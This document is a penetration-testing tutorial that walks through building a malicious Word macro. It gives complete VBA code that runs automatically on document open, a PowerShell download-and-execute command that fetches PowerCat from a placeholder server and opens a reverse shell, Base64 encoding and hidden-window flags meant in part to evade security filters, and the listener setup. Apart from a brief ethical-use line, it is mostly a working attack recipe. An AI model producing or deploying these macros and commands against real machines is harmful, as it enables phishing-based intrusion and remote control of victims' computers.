Windows Macro Exploitation

Windows Macro Exploitation for Ethical Penetration Testing

Table of Contents

1. Introduction to Microsoft Word Macros
2. Creating a Malicious Macro
3. Automating Macro Execution
4. Creating a Reverse Shell with PowerCat
5. Finalizing the Macro
6. Testing and Execution
7. Summary and Best Practices

---

Introduction to Microsoft Word Macros

Microsoft Word macros enable automation of repetitive tasks through Visual Basic for Applications (VBA). When conducting ethical penetration testing, macros can serve as a vector to execute commands on a target machine if the target enables macros upon opening the document.

Key Points

• File Formats: Use .doc or .docm formats to support macros. The .docx format does not support embedded macros.
• Scripting Language: VBA provides access to ActiveX objects and Windows Script Host, enabling low-level system commands.

---

Creating a Malicious Macro

1. Create and Save the Document:
   • Open Microsoft Word and create a blank document. Save it as test_macro.doc with the .doc extension to support macros.
2. Access the Macro Editor:
   • In the document, go to View > Macros > View Macros.
   • Enter AutoMacro as the macro name and select test_macro.doc in the dropdown. Then, click Create.
3. Define Basic Macro Code:

   • In the Visual Basic for Applications (VBA) editor, add the following code to open a PowerShell window:

     Sub AutoMacro()
         CreateObject("Wscript.Shell").Run "powershell"
     End Sub
     

   This code opens a PowerShell session upon executing the macro.

4. Save the Document:
   • Save your macro code within the editor, and close it to return to the document.

---

Automating Macro Execution

To ensure the macro executes automatically upon opening, add AutoOpen and Document_Open subroutines to the VBA code. These procedures call AutoMacro when the document opens.

Sub AutoOpen()
    AutoMacro
End Sub

Sub Document_Open()
    AutoMacro
End Sub

Sub AutoMacro()
    CreateObject("Wscript.Shell").Run "powershell"
End Sub

This ensures the macro will automatically execute if the user enables macros.

---

Creating a Reverse Shell with PowerCat

Once the macro execution is automated, the next step is to create a reverse shell using PowerCat.

1. Prepare the PowerShell Command:

   • The reverse shell connects back to the tester’s machine using PowerCat, a PowerShell utility that facilitates reverse shells. The base command looks like this:

     IEX(New-Object System.Net.WebClient).DownloadString('http://[YOUR_SERVER_IP]/powercat.ps1');powercat -c [LISTEN_IP] -p [PORT] -e powershell
     

   • Replace [YOUR_SERVER_IP], [LISTEN_IP], and [PORT] with your testing machine’s IP and the designated listening port.

2. Base64-Encode the Command:

   • To avoid character encoding issues, convert the command to Base64 format. On Linux or Mac, use:

     echo -n "powershell-command" | iconv -t utf-16le | base64
     

3. Automate String Concatenation Using Python:

   • Since VBA limits each line to 255 characters, split the Base64-encoded string into smaller chunks, around 50 characters each. The following Python script can split and format the string for VBA:

     str = "base64-encoded-string"
     n = 50  # Define chunk size
     
     for i in range(0, len(str), n):
         print('Str = Str + "' + str[i:i+n] + '"')
     

   • Replace "base64-encoded-string" with the actual Base64 string. The script will output VBA-friendly lines such as:

     Str = Str + "QWxsIGNoYXJhY3RlcnMgYW5kIHNwYWNlcyBoYXZl"
     Str = Str + "IGJlZW4gY29kZWQgdG8gYmFzZTY0IGZvciBlYXNl"
     

---

Finalizing the Macro

In the AutoMacro() function, combine AutoOpen and Document_Open with the PowerShell command that launches PowerCat. Here’s the complete VBA code:

Sub AutoOpen()
    AutoMacro
End Sub

Sub Document_Open()
    AutoMacro
End Sub

Sub AutoMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -enc "
    
    ' Add the Base64-encoded PowerShell command in chunks
    Str = Str + "QWxsIGNoYXJhY3RlcnMgYW5kIHNwYWNlcyBoYXZl"
    Str = Str + "IGJlZW4gY29kZWQgdG8gYmFzZTY0IGZvciBlYXNl"
    ' Additional lines continue here
    Str = Str + "IG9mIHJlYWRhYmlsaXR5IGFuZCBjb25zaXN0ZW5j"
    Str = Str + "eSBpbiBwcm9kdWNpbmcgc3RyaW5ncw=="

    ' Execute the command
    CreateObject("Wscript.Shell").Run Str
End Sub

In this script:

• Each Str = Str + "..." line adds a 50-character segment of the encoded PowerShell command to the Str variable.
• After constructing the command, CreateObject("Wscript.Shell").Run Str executes it in a hidden PowerShell session.

---

Testing and Execution

Steps

1. Start a Listener:

   • Open a Netcat listener on [PORT] to receive the reverse shell connection.

     nc -lvnp [PORT]
     

2. Host PowerCat:

   • Start a simple Python web server to host powercat.ps1:

     python3 -m http.server 80
     

3. Open the Document and Enable Macros:
   • Open test_macro.doc, and when prompted, enable macros.
   • The macro will execute, triggering a connection back to the listener.
4. Verify Reverse Shell:
   • If successful, you should see a reverse shell session from the target machine on your listener.

---

Summary and Best Practices

• Ethical Use: Only use these techniques with explicit permissions. Unauthorized use is illegal.
• Understanding Macro Execution: Be aware that many environments restrict macro execution.
• Base64 Encoding: Encoding PowerShell commands helps avoid issues with special characters and security filters.
• VBA Limitations: Using Python to split long strings helps accommodate VBA’s line character limits.